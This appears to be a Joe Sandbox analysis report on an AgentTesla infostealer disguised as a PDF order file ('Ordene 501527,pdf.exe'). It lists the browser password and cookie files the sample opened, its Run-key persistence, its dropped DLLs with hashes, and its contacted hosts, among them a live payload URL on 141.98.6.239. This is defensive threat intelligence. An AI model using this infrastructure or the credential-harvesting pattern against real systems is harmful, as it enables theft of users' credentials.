Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Source: Yara match	File source: 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 4428, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 4428, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	11 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	116 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 Process Injection	2 Obfuscated Files or Information	Security Account Manager	321 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	11 Registry Run Keys / Startup Folder	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	241 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	22 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	241 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Process Injection	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Ordene 501527,pdf.exe	7%	ReversingLabs	Win32.Malware.Tedy

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\nsd84B6.tmp\System.dll	3%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\nsd84B6.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\FanControlWrapper.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\FanControlWrapper.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\Microsoft.Office.Tools.Common.v9.0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\Microsoft.Office.Tools.Common.v9.0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\flex\flex.exe	0%	Metadefender	Browse
C:\Users\user\AppData\Roaming\flex\flex.exe	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
merian.com.ar	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
https://sectigo.com	0%	Virustotal		Browse
https://sectigo.com	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0	0%	Virustotal		Browse
https://sectigo.com/CPS0	0%	Avira URL Cloud	safe
https://api.ipify.org%appdata	0%	Avira URL Cloud	safe
https://rwUCPncwlnlg0H1LG.nett-	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	0%	Avira URL Cloud	safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	0%	Avira URL Cloud	safe
http://merian.com.ar	0%	Avira URL Cloud	safe
https://api.ipify.org%t-	0%	Avira URL Cloud	safe
http://FvewWS.com	0%	Avira URL Cloud	safe
http://mail.merian.com.ar	0%	Avira URL Cloud	safe
http://141.98.6.239/zeaveZtePRlRbWLesj75.dwp	0%	Avira URL Cloud	safe
http://141.98.6.239/zeaveZtePRlRbWLesj75.dwplh	0%	Avira URL Cloud	safe
https://rwUCPncwlnlg0H1LG.net	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
merian.com.ar	69.61.116.42	true	false	0%, Virustotal, Browse	unknown
mail.merian.com.ar	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://141.98.6.239/zeaveZtePRlRbWLesj75.dwp	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://sectigo.com	CasPol.exe, 00000009.00000002.44529629703.0000000020F90000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44529629703.0000000020F90000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.ipify.org%appdata	CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://rwUCPncwlnlg0H1LG.nett-	CasPol.exe, 00000009.00000002.44518958056.000000001DA75000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://merian.com.ar	CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org%t-	CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://FvewWS.com	CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.google.com/chrome/?p=plugin_flash	CasPol.exe, 00000009.00000002.44518397705.000000001DA13000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	Ordene 501527,pdf.exe	false		high
http://mail.merian.com.ar	CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://141.98.6.239/zeaveZtePRlRbWLesj75.dwplh	CasPol.exe, 00000009.00000002.44498847642.00000000014D6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://rwUCPncwlnlg0H1LG.net	CasPol.exe, 00000009.00000002.44518958056.000000001DA75000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.40043700714.000000001C831000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519545264.000000001DAD1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
69.61.116.42	merian.com.ar	United States		22653	GLOBALCOMPASSUS	false
141.98.6.239	unknown	Germany		33657	CMCSUS	false

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	680367
Start date and time: 08/08/202213:27:29	2022-08-08 13:27:29 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Ordene 501527,pdf.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.spyw.evad.winEXE@8/12@1/2
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 100% (good quality ratio 100%) Quality average: 91.6% Quality standard deviation: 15.8%
HCA Information:	Successful, ratio: 95% Number of executed functions: 64 Number of non-executed functions: 19
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.82.207.122, 20.93.58.141
Excluded domains from analysis (whitelisted): wd-prod-cp-eu-north-3-fe.northeurope.cloudapp.azure.com, spclient.wg.spotify.com, client.wns.windows.com, wdcpalt.microsoft.com, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net
Execution Graph export aborted for target flex.exe, PID 5196 because it is empty
Execution Graph export aborted for target flex.exe, PID 7436 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:30:16	API Interceptor	2613x Sleep call for process: CasPol.exe modified
13:30:18	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run flex C:\Users\user\AppData\Roaming\flex\flex.exe
13:30:27	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run flex C:\Users\user\AppData\Roaming\flex\flex.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
69.61.116.42	Al#U0131nd#U0131 DHL_119040,pdf.exe	Get hash	malicious	Browse
141.98.6.239	Sipari#U015f Metak_WJO-001,pdf.exe	Get hash	malicious	Browse	141.98.6.239/rawfile_Otxel64.bin
	Sipari#U015f Monteput_PR-211299,PDF.exe	Get hash	malicious	Browse	141.98.6.239/BLESSED%20XLOADER_SOquWlgQ188.bin
	DHL_119050 de recibo,PDF.exe	Get hash	malicious	Browse	141.98.6.239/kvPZe176.ocx
	Sat#U0131n Alma Emri Metak_JJO-003, PDF.exe	Get hash	malicious	Browse	141.98.6.239/BLESSED%20XLOADER_JSCbuFc182.bin
	DHL_229140 documento de recebimento,pdf.exe	Get hash	malicious	Browse	141.98.6.239/raw_feaRXDSNhr154.bin
	Al#U0131nd#U0131 DHL_119040,pdf.exe	Get hash	malicious	Browse	141.98.6.239/Rawfile_fegyLfPH61.bin
	ORD#U00da CEANNAIGH- 34002174.exe	Get hash	malicious	Browse	141.98.6.239/raw_ISqWCcxKZ47.bin
	vbc.exe	Get hash	malicious	Browse	141.98.6.239/BLESSED%20XLOADER_gGZUiHK168.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CMCSUS	Sipari#U015f Metak_WJO-001,pdf.exe	Get hash	malicious	Browse	141.98.6.239
	Sipari#U015f Monteput_PR-211299,PDF.exe	Get hash	malicious	Browse	141.98.6.239
	CACC4A8205231660ABBF0B47FFBF1B1A17CAD8610034B.exe	Get hash	malicious	Browse	141.98.6.123
	https://amanossystem.de/MTI1ODcwMDU5ibmxZ2VuLXBhZ2V4LTEzOTgwNTAyMDFpZmV0Y2h4b3J0aXNlY3VyZWR4dG9sbGdyb3VwLmNvbQ==	Get hash	malicious	Browse	171.22.30.45
	Quote_PDF.js	Get hash	malicious	Browse	171.22.30.21
	DHL_119050 de recibo,PDF.exe	Get hash	malicious	Browse	141.98.6.239
	Quote_PDF.js	Get hash	malicious	Browse	171.22.30.21
	6ctS10KOUw	Get hash	malicious	Browse	171.22.30.42
	vY0pwbEjCy	Get hash	malicious	Browse	171.22.30.42
	TiC331oLql	Get hash	malicious	Browse	171.22.30.42
	M6QF2iPEhY	Get hash	malicious	Browse	171.22.30.42
	FLR8L1i57H	Get hash	malicious	Browse	171.22.30.42
	S8IcY2CZlC	Get hash	malicious	Browse	171.22.30.42
	6dvrI3JuMD	Get hash	malicious	Browse	171.22.30.42
	bNvYxLYZES	Get hash	malicious	Browse	171.22.30.42
	BpP29cFe2f	Get hash	malicious	Browse	171.22.30.42
	DOh3a8QOpa	Get hash	malicious	Browse	171.22.30.42
	CV.exe	Get hash	malicious	Browse	141.98.6.128
	Sat#U0131n Alma Emri Metak_JJO-003, PDF.exe	Get hash	malicious	Browse	141.98.6.239
	SecuriteInfo.com.Variant.Tedy.115538.28537.exe	Get hash	malicious	Browse	141.98.6.128
GLOBALCOMPASSUS	bBkF9FVNQP	Get hash	malicious	Browse	66.154.43.100
	Al#U0131nd#U0131 DHL_119040,pdf.exe	Get hash	malicious	Browse	69.61.116.42
	chscbrEhPh.dll	Get hash	malicious	Browse	69.61.94.59
	O462TNbvHJ	Get hash	malicious	Browse	69.61.59.52
	miori.arm7	Get hash	malicious	Browse	69.61.63.248
	Ia2OMVYinc	Get hash	malicious	Browse	69.61.63.231
	meerkat.x86	Get hash	malicious	Browse	66.154.43.139
	sora.arm	Get hash	malicious	Browse	66.154.43.144
	piBOh0idQ7	Get hash	malicious	Browse	66.154.43.159
	https://cutt.us/CfLWv?1tl	Get hash	malicious	Browse	69.61.26.123
	https://cutt.us/BX7qZ?jy4wk	Get hash	malicious	Browse	69.61.26.121
	https://cutt.us:443/VthcM?wik	Get hash	malicious	Browse	69.61.26.121
	https://cutt.us/oPNMU?imp	Get hash	malicious	Browse	69.61.26.121
	https://cutt.us/5nTCB?mbj37	Get hash	malicious	Browse	69.61.26.123
	https://cutt.us/ajbRy?otuj	Get hash	malicious	Browse	69.61.26.122
	RS19vO3Uv0	Get hash	malicious	Browse	66.154.61.189
	arm7	Get hash	malicious	Browse	69.61.63.235
	X23w5tKkA0	Get hash	malicious	Browse	69.61.63.253
	4QpvoX8qYS	Get hash	malicious	Browse	69.61.63.240
	h1TYu4T867	Get hash	malicious	Browse	66.154.43.107

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nsd84B6.tmp\System.dll	Ordene 501527,pdf.exe	Get hash	malicious	Browse
	DHL_119050 de recibo,PDF.exe	Get hash	malicious	Browse
	DHL_119050 de recibo,PDF.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\FanControlWrapper.dll	Ordene 501527,pdf.exe	Get hash	malicious	Browse
	DHL_119050 de recibo,PDF.exe	Get hash	malicious	Browse
	DHL_119050 de recibo,PDF.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\Microsoft.Office.Tools.Common.v9.0.dll	Ordene 501527,pdf.exe	Get hash	malicious	Browse
	DHL_119050 de recibo,PDF.exe	Get hash	malicious	Browse
	DHL_119050 de recibo,PDF.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\flex\flex.exe	DHL_229140 documento de recebimento,pdf.exe	Get hash	malicious	Browse
	Al#U0131nd#U0131 DHL_119040,pdf.exe	Get hash	malicious	Browse
	ORD#U00da CEANNAIGH- 34002174.exe	Get hash	malicious	Browse
	Nanda.exe	Get hash	malicious	Browse
	#U56de#U590d#Uff1a#U63a1#U8cfc#U8a02#U55ae (PO_22-4556-1472_REV00).exe	Get hash	malicious	Browse
	Nonfeelingly.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Tedy.164775.28245.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.MSIL.Inject.10631.exe	Get hash	malicious	Browse
	Enquiry_#23062022.pdf.exe	Get hash	malicious	Browse
	INV 1337.exe	Get hash	malicious	Browse
	IV202102011_Invoice updated on May 2022.exe	Get hash	malicious	Browse
	GTV3285776_06172022.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.27052.exe	Get hash	malicious	Browse
	vbc.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.24313.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan005944781.27289.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.950064.31800.exe	Get hash	malicious	Browse
	ldzOp71fAH.exe	Get hash	malicious	Browse
	9114044_Shanghai Global Precision Invoice20210822.exe	Get hash	malicious	Browse
	SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.10169.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\flex.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\flex\flex.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Temp\nsd84B6.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Ordene 501527,pdf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.659384359264642
Encrypted:	false
SSDEEP:	192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
MD5:	8B3830B9DBF87F84DDD3B26645FED3A0
SHA1:	223BEF1F19E644A610A0877D01EADC9E28299509
SHA-256:	F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
SHA-512:	D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Ordene 501527,pdf.exe, Detection: malicious, Browse Filename: DHL_119050 de recibo,PDF.exe, Detection: malicious, Browse Filename: DHL_119050 de recibo,PDF.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\FanControlWrapper.dll

Download File

Process:	C:\Users\user\Desktop\Ordene 501527,pdf.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	53480
Entropy (8bit):	6.013119476725682
Encrypted:	false
SSDEEP:	768:Sd5iVw6ve4HsIrMTW5q6Aq2g1AEpwhaPvWFzg4KClyQ2c94PkhEeaA2X9qKh:s4wmnMT6Jp2g1a4s+7
MD5:	8D512C6FFE33E6B77981497ED40D9092
SHA1:	A31DE10B01C626D528FEF987CE5D7DB68D228849
SHA-256:	25673566002F8EEF81872E2913DA0E44D0B7480EF824EDD1C12D725A122CAE1C
SHA-512:	479DDADE0F58CFDEB43EEACD38D0CE8A361275A2BD4257CDF4FA3DD5A5FEEF231E6E41D0F2BF3F17AF8DF38B0DB72114677C42B69865F90F81329041CDFBB4A5
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Ordene 501527,pdf.exe, Detection: malicious, Browse Filename: DHL_119050 de recibo,PDF.exe, Detection: malicious, Browse Filename: DHL_119050 de recibo,PDF.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3..-w..~w..~w..~~..~q..~%..t..~...s..~i..~u..~%..d..~%.....~%..u..~...u..~w..~Y..~...r..~...v..~..x~v..~w..~v..~...v..~Richw..~................PE..d...h6;a.........." .....2...........>..............................................$(....`......................................... ...........................................@....S..p............................T...............P..............XS..H............text............0.................. ..`.nep....p....@.......4.............. ..`.rdata..$m...P...n...6..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..@...........................@..B................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\Microsoft.Office.Tools.Common.v9.0.dll

Download File

Process:	C:\Users\user\Desktop\Ordene 501527,pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	356352
Entropy (8bit):	5.597789776248351
Encrypted:	false
SSDEEP:	6144:gAENg6Ta1Hjxcv/IUIuoeT/xK6ur6EaPC:gdgbFK/IU7T/xK6ur6EaP
MD5:	E047210B4CE2BBF0F6A9819031C5874A
SHA1:	FBE964CABCD15468EFF6848ACE2F49E194C2B1B4
SHA-256:	F0C45C94B8B1B38718FD373E9E98BF76A5552D8405DE3A98A6CADBE9610F7E74
SHA-512:	57754F490FAD208076EA717470E431493396556E5DC4BE53ED2ACFBBC00857B9F6A5AEDA66FFE82F4E4CF405ABEF16E72F77535932E9D166CC4F3DE262AC09D8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Ordene 501527,pdf.exe, Detection: malicious, Browse Filename: DHL_119050 de recibo,PDF.exe, Detection: malicious, Browse Filename: DHL_119050 de recibo,PDF.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..H...........!.........P.......-... ...@....UA. ....................................@..................................-..W....@..`7...........................,............................................... ............... ..H............text........ ...................... ..`.rsrc...`7...@...@... ..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\edit-cut-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\Ordene 501527,pdf.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1327
Entropy (8bit):	4.272364610533777
Encrypted:	false
SSDEEP:	24:2dPnnxu3tlKpRe+9abXi2QP+60wWgP7IC233P+60cXW7GTNWgPN:cfnHFabXij+zgP7ICK+r7GTUgPN
MD5:	36C1AE9391F50D4AD3A1E61CA30CBFCB
SHA1:	DF3D58AB8DBFD1CE9F0456C4F8C84440A1005507
SHA-256:	9FDDABAAF63AE19BA00A965BBDAACAC3703AB2F055661040A4ACFF2882D0087B
SHA-512:	180D77E3FA447CED1276C2E2070E110667530C864C71961E97E80B51C214C7BEBF604104F6A0DF87A4779E6E3AD08C5A574278F70C6D36C083FE727B1DD66476
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <g fill="#2e3436">. <path d="m 14 1 l -5.203125 4.972656 l 1.5625 1.527344 l 5.640625 -5.5 v -1 z m -6.804688 6.5 l -2.976562 2.84375 l 1.6875 1.5 l 2.890625 -2.816406 z m 0 0"/>. <path d="m 4.21875 5.65625 l 9.78125 9.34375 h 2 v -1 l -10.09375 -9.84375 z m 0 0"/>. <path d="m 5.972656 1.019531 c -1.359375 -1.359375 -3.59375 -1.359375 -4.953125 0 c -1.359375 1.359375 -1.359375 3.59375 0 4.953125 s 3.59375 1.363282 4.953125 0 c 1.359375 -1.359375 1.359375 -3.59375 0 -4.953125 z m -1.414062 1.414063 c 0.597656 0.59375 0.597656 1.53125 0 2.125 c -0.59375 0.597656 -1.527344 0.597656 -2.125 0 c -0.59375 -0.59375 -0.59375 -1.527344 0 -2.125 c 0.597656 -0.59375 1.53125 -0.59375 2.125 0 z m 0 0"/>. <path d="m 5.972656 10.019531 c -1.359375 -1.359375 -3.59375 -1.359375 -4.953125 0 c -1.359375 1.359375 -1.359375 3.597657 0 4.957031 c 1.359

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Perciform\Selskabelig\Hjemmeopgaven\vrkstedsbygninger\Ricciaceae185.Inc

Download File

Process:	C:\Users\user\Desktop\Ordene 501527,pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	76679
Entropy (8bit):	6.814432315698124
Encrypted:	false
SSDEEP:	1536:XJV/wgXTw40tzGcM8E7nhHaxpqeGhJrfBxdKTi:XJWgXTyvE7nqMhJvL
MD5:	FFDF86E18706923E73DE9A5D67A8C9EB
SHA1:	F01102765BEEB1330F29E2427C9559EDBEEA8D4E
SHA-256:	63D2CBFFAB97859707640C94C9810AF953093F01FF0E7FDB2DBFF3827935EDC0
